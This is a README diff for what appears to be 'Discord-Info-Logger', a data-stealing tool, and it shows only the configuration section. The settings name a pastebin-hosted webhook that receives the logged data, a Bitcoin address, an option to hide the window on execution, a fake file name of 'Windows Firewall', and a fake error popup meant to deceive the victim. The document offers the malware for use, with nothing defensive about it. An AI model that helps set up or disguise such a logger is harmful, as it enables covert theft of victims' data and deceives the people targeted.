Wh014M/Discord-Info-Logger/README.md

 ```
 # Configuration
 debugger = False <--- Change this if you are having any issues with the logger.
 It will print any errors.
-BTC_ADDRESS = '3LsZH7LqxJMZBaVU9YoTLk8HNnUcmzE88v' <--- Change this to your own bitcoin address
+BTC_ADDRESS = '3LsZH7LqxJMZBaVU9YoTLk8HNnUcmzE88v' <--- Change this to your own bitcoin address.
-pastebin = "https://pastebin.com/raw/id" <--- Change this to your own pastebin link that contains your webhook
+pastebin = "https://pastebin.com/raw/id" <--- Change this to your own pastebin link that contains your webhook.
 hiddenWindow = False <--- Set this to True or False.
-If you want the window to be hidden on execution then set this to True
+If you want the window to be hidden on execution then set this to True.
 FakeFileName = "Windows Firewall" <--- Change this to the fake desired name.
+fakeError = True  <--- Set this to True or False.
+If you want a fake error message to popup then set it to True.
+fakeErrorMessage = "An unexpected error has occured."  <--- If you have fakeError enabled, change this to what you want the fake error popup to say.
+fakeErrorTitle = "Oops!" <--- If you have fakeError enabled, change this to what you want the fake error popup title to say.
 ```

 # Support